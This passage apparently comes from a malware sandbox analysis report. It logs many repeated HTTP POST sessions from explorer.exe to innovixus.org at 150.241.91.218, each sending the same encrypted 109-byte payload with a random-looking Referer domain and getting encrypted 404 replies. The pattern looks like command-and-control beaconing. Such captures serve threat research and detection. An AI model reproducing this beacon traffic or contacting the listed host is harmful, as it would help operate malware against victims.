                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              Data Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                              Data Ascii: 2f+g@GHSN'E|6V#^.v0


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              34192.168.11.2049788150.241.91.218805064C:\Windows\explorer.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Nov 6, 2024 17:35:31.952459097 CET282OUTPOST /index.php HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                              Accept: */*
                                                                                                                                                              Referer: http://hqirnpgtmfcswve.org/
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                              Content-Length: 109
                                                                                                                                                              Host: innovixus.org
                                                                                                                                                              Nov 6, 2024 17:35:31.952459097 CET109OUTData Raw: 4f c3 54 7c 9e 09 58 0b 1f 02 2c ab 90 34 5d df 8a ca cb a7 b2 a7 8d 60 40 05 be 13 b2 6a bb 10 17 fb 1f 47 74 54 ce 66 f6 28 38 9c b5 3f 05 d3 50 35 86 f8 58 09 d3 16 c5 63 32 eb dd df 5d 9f b2 e1 1f 61 69 6e 69 7b 05 d5 0d 11 fc 0e 09 d4 8c 7f
                                                                                                                                                              Data Ascii: OT|X,4]`@jGtTf(8?P5Xc2]aini{ "G"I\w1$O4
                                                                                                                                                              Nov 6, 2024 17:35:32.210377932 CET235INHTTP/1.1 404 Not Found
                                                                                                                                                              Server: nginx/1.22.1
                                                                                                                                                              Date: Wed, 06 Nov 2024 16:35:32 GMT
                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              Data Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                              Data Ascii: 2f+g@GHSN'E|6V#^.v0


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              35192.168.11.2049789150.241.91.218805064C:\Windows\explorer.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Nov 6, 2024 17:35:32.410669088 CET278OUTPOST /index.php HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                              Accept: */*
                                                                                                                                                              Referer: http://nfhkssmdhhy.org/
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                              Content-Length: 109
                                                                                                                                                              Host: innovixus.org
                                                                                                                                                              Nov 6, 2024 17:35:32.410669088 CET109OUTData Raw: 4f c3 54 7c 9e 09 58 0b 1f 02 2c ab 90 34 5d df 8a ca cb a7 b2 a7 8d 60 40 05 be 13 b2 6a bb 10 17 fb 1f 47 74 54 ce 66 f6 28 38 9c b5 3f 05 d3 50 35 86 f8 58 09 d3 16 c5 63 32 eb dd df 5d 9f b2 e1 1f 61 69 6e 69 7b 05 d5 0d 11 fc 0e 09 d4 8c 7f
                                                                                                                                                              Data Ascii: OT|X,4]`@jGtTf(8?P5Xc2]aini{ "G"I\w1$O4
                                                                                                                                                              Nov 6, 2024 17:35:32.668303967 CET235INHTTP/1.1 404 Not Found
                                                                                                                                                              Server: nginx/1.22.1
                                                                                                                                                              Date: Wed, 06 Nov 2024 16:35:32 GMT
                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              Data Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                              Data Ascii: 2f+g@GHSN'E|6V#^.v0


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              36192.168.11.2049790150.241.91.218805064C:\Windows\explorer.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Nov 6, 2024 17:35:32.868283987 CET282OUTPOST /index.php HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                              Accept: */*
                                                                                                                                                              Referer: http://omahgqfjhyfubyc.org/
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                              Content-Length: 109
                                                                                                                                                              Host: innovixus.org
                                                                                                                                                              Nov 6, 2024 17:35:32.868283987 CET109OUTData Raw: 4f c3 54 7c 9e 09 58 0b 1f 02 2c ab 90 34 5d df 8a ca cb a7 b2 a7 8d 60 40 05 be 13 b2 6a bb 10 17 fb 1f 47 74 54 ce 66 f6 28 38 9c b5 3f 05 d3 50 35 86 f8 58 09 d3 16 c5 63 32 eb dd df 5d 9f b2 e1 1f 61 69 6e 69 7b 05 d5 0d 11 fc 0e 09 d4 8c 7f
                                                                                                                                                              Data Ascii: OT|X,4]`@jGtTf(8?P5Xc2]aini{ "G"I\w1$O4
                                                                                                                                                              Nov 6, 2024 17:35:33.120132923 CET235INHTTP/1.1 404 Not Found
                                                                                                                                                              Server: nginx/1.22.1
                                                                                                                                                              Date: Wed, 06 Nov 2024 16:35:33 GMT
                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              Data Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                              Data Ascii: 2f+g@GHSN'E|6V#^.v0


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              37192.168.11.2049791150.241.91.218805064C:\Windows\explorer.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Nov 6, 2024 17:35:33.319253922 CET281OUTPOST /index.php HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                              Accept: */*
                                                                                                                                                              Referer: http://xsdqkghuelhdwm.org/
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                              Content-Length: 109
                                                                                                                                                              Host: innovixus.org
                                                                                                                                                              Nov 6, 2024 17:35:33.319253922 CET109OUTData Raw: 4f c3 54 7c 9e 09 58 0b 1f 02 2c ab 90 34 5d df 8a ca cb a7 b2 a7 8d 60 40 05 be 13 b2 6a bb 10 17 fb 1f 47 74 54 ce 66 f6 28 38 9c b5 3f 05 d3 50 35 86 f8 58 09 d3 16 c5 63 32 eb dd df 5d 9f b2 e1 1f 61 69 6e 69 7b 05 d5 0d 11 fc 0e 09 d4 8c 7f
                                                                                                                                                              Data Ascii: OT|X,4]`@jGtTf(8?P5Xc2]aini{ "G"I\w1$O4
                                                                                                                                                              Nov 6, 2024 17:35:34.589271069 CET235INHTTP/1.1 404 Not Found
                                                                                                                                                              Server: nginx/1.22.1
                                                                                                                                                              Date: Wed, 06 Nov 2024 16:35:34 GMT
                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              Data Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                              Data Ascii: 2f+g@GHSN'E|6V#^.v0


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              38192.168.11.2049792150.241.91.218805064C:\Windows\explorer.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Nov 6, 2024 17:35:34.799185991 CET282OUTPOST /index.php HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                              Accept: */*
                                                                                                                                                              Referer: http://tkhduygqfshlmvq.org/
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                              Content-Length: 109
                                                                                                                                                              Host: innovixus.org
                                                                                                                                                              Nov 6, 2024 17:35:34.799185991 CET109OUTData Raw: 4f c3 54 7c 9e 09 58 0b 1f 02 2c ab 90 34 5d df 8a ca cb a7 b2 a7 8d 60 40 05 be 13 b2 6a bb 10 17 fb 1f 47 74 54 ce 66 f6 28 38 9c b5 3f 05 d3 50 35 86 f8 58 09 d3 16 c5 63 32 eb dd df 5d 9f b2 e1 1f 61 69 6e 69 7b 05 d5 0d 11 fc 0e 09 d4 8c 7f
                                                                                                                                                              Data Ascii: OT|X,4]`@jGtTf(8?P5Xc2]aini{ "G"I\w1$O4
                                                                                                                                                              Nov 6, 2024 17:35:36.062391043 CET235INHTTP/1.1 404 Not Found
                                                                                                                                                              Server: nginx/1.22.1
                                                                                                                                                              Date: Wed, 06 Nov 2024 16:35:35 GMT
                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              Data Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                              Data Ascii: 2f+g@GHSN'E|6V#^.v0


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              39192.168.11.2049793150.241.91.218805064C:\Windows\explorer.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Nov 6, 2024 17:35:36.269884109 CET280OUTPOST /index.php HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                              Accept: */*
                                                                                                                                                              Referer: http://njnqechluueke.com/
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                              Content-Length: 109
                                                                                                                                                              Host: innovixus.org
                                                                                                                                                              Nov 6, 2024 17:35:36.269884109 CET109OUTData Raw: 4f c3 54 7c 9e 09 58 0b 1f 02 2c ab 90 34 5d df 8a ca cb a7 b2 a7 8d 60 40 05 be 13 b2 6a bb 10 17 fb 1f 47 74 54 ce 66 f6 28 38 9c b5 3f 05 d3 50 35 86 f8 58 09 d3 16 c5 63 32 eb dd df 5d 9f b2 e1 1f 61 69 6e 69 7b 05 d5 0d 11 fc 0e 09 d4 8c 7f
                                                                                                                                                              Data Ascii: OT|X,4]`@jGtTf(8?P5Xc2]aini{ "G"I\w1$O4
                                                                                                                                                              Nov 6, 2024 17:35:36.527111053 CET235INHTTP/1.1 404 Not Found
                                                                                                                                                              Server: nginx/1.22.1
                                                                                                                                                              Date: Wed, 06 Nov 2024 16:35:36 GMT
                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              Data Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                              Data Ascii: 2f+g@GHSN'E|6V#^.v0


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              40192.168.11.2049794150.241.91.218805064C:\Windows\explorer.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Nov 6, 2024 17:35:36.735793114 CET283OUTPOST /index.php HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                              Accept: */*
                                                                                                                                                              Referer: http://tiemlhjlfkoejnes.net/
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                              Content-Length: 109
                                                                                                                                                              Host: innovixus.org
                                                                                                                                                              Nov 6, 2024 17:35:36.735793114 CET109OUTData Raw: 4f c3 54 7c 9e 09 58 0b 1f 02 2c ab 90 34 5d df 8a ca cb a7 b2 a7 8d 60 40 05 be 13 b2 6a bb 10 17 fb 1f 47 74 54 ce 66 f6 28 38 9c b5 3f 05 d3 50 35 86 f8 58 09 d3 16 c5 63 32 eb dd df 5d 9f b2 e1 1f 61 69 6e 69 7b 05 d5 0d 11 fc 0e 09 d4 8c 7f
                                                                                                                                                              Data Ascii: OT|X,4]`@jGtTf(8?P5Xc2]aini{ "G"I\w1$O4
                                                                                                                                                              Nov 6, 2024 17:35:36.994817972 CET235INHTTP/1.1 404 Not Found
                                                                                                                                                              Server: nginx/1.22.1
                                                                                                                                                              Date: Wed, 06 Nov 2024 16:35:36 GMT
                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              Data Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                              Data Ascii: 2f+g@GHSN'E|6V#^.v0


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              41192.168.11.2049795150.241.91.218805064C:\Windows\explorer.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Nov 6, 2024 17:35:37.220001936 CET278OUTPOST /index.php HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                              Accept: */*
                                                                                                                                                              Referer: http://bvusuaabwau.org/
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                              Content-Length: 109
                                                                                                                                                              Host: innovixus.org
                                                                                                                                                              Nov 6, 2024 17:35:37.220001936 CET109OUTData Raw: 4f c3 54 7c 9e 09 58 0b 1f 02 2c ab 90 34 5d df 8a ca cb a7 b2 a7 8d 60 40 05 be 13 b2 6a bb 10 17 fb 1f 47 74 54 ce 66 f6 28 38 9c b5 3f 05 d3 50 35 86 f8 58 09 d3 16 c5 63 32 eb dd df 5d 9f b2 e1 1f 61 69 6e 69 7b 05 d5 0d 11 fc 0e 09 d4 8c 7f
                                                                                                                                                              Data Ascii: OT|X,4]`@jGtTf(8?P5Xc2]aini{ "G"I\w1$O4
                                                                                                                                                              Nov 6, 2024 17:35:37.476864100 CET235INHTTP/1.1 404 Not Found
                                                                                                                                                              Server: nginx/1.22.1
                                                                                                                                                              Date: Wed, 06 Nov 2024 16:35:37 GMT
                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              Data Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                              Data Ascii: 2f+g@GHSN'E|6V#^.v0


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              42192.168.11.2049796150.241.91.218805064C:\Windows\explorer.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Nov 6, 2024 17:35:37.682084084 CET280OUTPOST /index.php HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                              Accept: */*
                                                                                                                                                              Referer: http://axgnbkkukxdmk.org/
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                              Content-Length: 109
                                                                                                                                                              Host: innovixus.org
                                                                                                                                                              Nov 6, 2024 17:35:37.682084084 CET109OUTData Raw: 4f c3 54 7c 9e 09 58 0b 1f 02 2c ab 90 34 5d df 8a ca cb a7 b2 a7 8d 60 40 05 be 13 b2 6a bb 10 17 fb 1f 47 74 54 ce 66 f6 28 38 9c b5 3f 05 d3 50 35 86 f8 58 09 d3 16 c5 63 32 eb dd df 5d 9f b2 e1 1f 61 69 6e 69 7b 05 d5 0d 11 fc 0e 09 d4 8c 7f
                                                                                                                                                              Data Ascii: OT|X,4]`@jGtTf(8?P5Xc2]aini{ "G"I\w1$O4
                                                                                                                                                              Nov 6, 2024 17:35:37.938829899 CET235INHTTP/1.1 404 Not Found
                                                                                                                                                              Server: nginx/1.22.1
                                                                                                                                                              Date: Wed, 06 Nov 2024 16:35:37 GMT
                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              Data Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                              Data Ascii: 2f+g@GHSN'E|6V#^.v0


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              43192.168.11.2049797150.241.91.218805064C:\Windows\explorer.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Nov 6, 2024 17:35:38.142812014 CET280OUTPOST /index.php HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                              Accept: */*
                                                                                                                                                              Referer: http://gqgulsetucmpr.org/
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                              Content-Length: 109
                                                                                                                                                              Host: innovixus.org
                                                                                                                                                              Nov 6, 2024 17:35:38.142812014 CET109OUTData Raw: 4f c3 54 7c 9e 09 58 0b 1f 02 2c ab 90 34 5d df 8a ca cb a7 b2 a7 8d 60 40 05 be 13 b2 6a bb 10 17 fb 1f 47 74 54 ce 66 f6 28 38 9c b5 3f 05 d3 50 35 86 f8 58 09 d3 16 c5 63 32 eb dd df 5d 9f b2 e1 1f 61 69 6e 69 7b 05 d5 0d 11 fc 0e 09 d4 8c 7f
                                                                                                                                                              Data Ascii: OT|X,4]`@jGtTf(8?P5Xc2]aini{ "G"I\w1$O4
                                                                                                                                                              Nov 6, 2024 17:35:38.900866032 CET235INHTTP/1.1 404 Not Found
                                                                                                                                                              Server: nginx/1.22.1
                                                                                                                                                              Date: Wed, 06 Nov 2024 16:35:38 GMT
                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              Data Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                              Data Ascii: 2f+g@GHSN'E|6V#^.v0


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              44192.168.11.2049798150.241.91.218805064C:\Windows\explorer.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Nov 6, 2024 17:35:39.108850002 CET282OUTPOST /index.php HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                              Accept: */*
                                                                                                                                                              Referer: http://jiwkxehtxvsxfog.com/
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                              Content-Length: 109
                                                                                                                                                              Host: innovixus.org
                                                                                                                                                              Nov 6, 2024 17:35:39.108850956 CET109OUTData Raw: 4f c3 54 7c 9e 09 58 0b 1f 02 2c ab 90 34 5d df 8a ca cb a7 b2 a7 8d 60 40 05 be 13 b2 6a bb 10 17 fb 1f 47 74 54 ce 66 f6 28 38 9c b5 3f 05 d3 50 35 86 f8 58 09 d3 16 c5 63 32 eb dd df 5d 9f b2 e1 1f 61 69 6e 69 7b 05 d5 0d 11 fc 0e 09 d4 8c 7f
                                                                                                                                                              Data Ascii: OT|X,4]`@jGtTf(8?P5Xc2]aini{ "G"I\w1$O4
                                                                                                                                                              Nov 6, 2024 17:35:39.368335962 CET235INHTTP/1.1 404 Not Found
                                                                                                                                                              Server: nginx/1.22.1
                                                                                                                                                              Date: Wed, 06 Nov 2024 16:35:39 GMT
                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              Data Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                              Data Ascii: 2f+g@GHSN'E|6V#^.v0


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              45192.168.11.2049799150.241.91.218805064C:\Windows\explorer.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Nov 6, 2024 17:35:39.570897102 CET278OUTPOST /index.php HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                              Accept: */*
                                                                                                                                                              Referer: http://amurpggwmqw.net/
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                              Content-Length: 109
                                                                                                                                                              Host: innovixus.org
                                                                                                                                                              Nov 6, 2024 17:35:39.570898056 CET109OUTData Raw: 4f c3 54 7c 9e 09 58 0b 1f 02 2c ab 90 34 5d df 8a ca cb a7 b2 a7 8d 60 40 05 be 13 b2 6a bb 10 17 fb 1f 47 74 54 ce 66 f6 28 38 9c b5 3f 05 d3 50 35 86 f8 58 09 d3 16 c5 63 32 eb dd df 5d 9f b2 e1 1f 61 69 6e 69 7b 05 d5 0d 11 fc 0e 09 d4 8c 7f
                                                                                                                                                              Data Ascii: OT|X,4]`@jGtTf(8?P5Xc2]aini{ "G"I\w1$O4
                                                                                                                                                              Nov 6, 2024 17:35:39.840046883 CET235INHTTP/1.1 404 Not Found
                                                                                                                                                              Server: nginx/1.22.1
                                                                                                                                                              Date: Wed, 06 Nov 2024 16:35:39 GMT
                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              Data Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                              Data Ascii: 2f+g@GHSN'E|6V#^.v0


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              46192.168.11.2049800150.241.91.218805064C:\Windows\explorer.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Nov 6, 2024 17:35:40.051405907 CET278OUTPOST /index.php HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                              Accept: */*
                                                                                                                                                              Referer: http://pjbrruxfxfv.net/
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                              Content-Length: 109
                                                                                                                                                              Host: innovixus.org
                                                                                                                                                              Nov 6, 2024 17:35:40.051405907 CET109OUTData Raw: 4f c3 54 7c 9e 09 58 0b 1f 02 2c ab 90 34 5d df 8a ca cb a7 b2 a7 8d 60 40 05 be 13 b2 6a bb 10 17 fb 1f 47 74 54 ce 66 f6 28 38 9c b5 3f 05 d3 50 35 86 f8 58 09 d3 16 c5 63 32 eb dd df 5d 9f b2 e1 1f 61 69 6e 69 7b 05 d5 0d 11 fc 0e 09 d4 8c 7f
                                                                                                                                                              Data Ascii: OT|X,4]`@jGtTf(8?P5Xc2]aini{ "G"I\w1$O4
                                                                                                                                                              Nov 6, 2024 17:35:40.312019110 CET235INHTTP/1.1 404 Not Found
                                                                                                                                                              Server: nginx/1.22.1
                                                                                                                                                              Date: Wed, 06 Nov 2024 16:35:40 GMT
                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              Data Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                              Data Ascii: 2f+g@GHSN'E|6V#^.v0


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              47192.168.11.2049801150.241.91.218805064C:\Windows\explorer.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Nov 6, 2024 17:35:40.518791914 CET282OUTPOST /index.php HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                              Accept: */*
                                                                                                                                                              Referer: http://aeijiyoowkwabgv.com/
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                              Content-Length: 109
                                                                                                                                                              Host: innovixus.org
                                                                                                                                                              Nov 6, 2024 17:35:40.518791914 CET109OUTData Raw: 4f c3 54 7c 9e 09 58 0b 1f 02 2c ab 90 34 5d df 8a ca cb a7 b2 a7 8d 60 40 05 be 13 b2 6a bb 10 17 fb 1f 47 74 54 ce 66 f6 28 38 9c b5 3f 05 d3 50 35 86 f8 58 09 d3 16 c5 63 32 eb dd df 5d 9f b2 e1 1f 61 69 6e 69 7b 05 d5 0d 11 fc 0e 09 d4 8c 7f
                                                                                                                                                              Data Ascii: OT|X,4]`@jGtTf(8?P5Xc2]aini{ "G"I\w1$O4
                                                                                                                                                              Nov 6, 2024 17:35:40.781490088 CET235INHTTP/1.1 404 Not Found
                                                                                                                                                              Server: nginx/1.22.1
                                                                                                                                                              Date: Wed, 06 Nov 2024 16:35:40 GMT
                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              Data Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                              Data Ascii: 2f+g@GHSN'E|6V#^.v0


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              48192.168.11.2049802150.241.91.218805064C:\Windows\explorer.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Nov 6, 2024 17:35:40.997145891 CET281OUTPOST /index.php HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                              Accept: */*
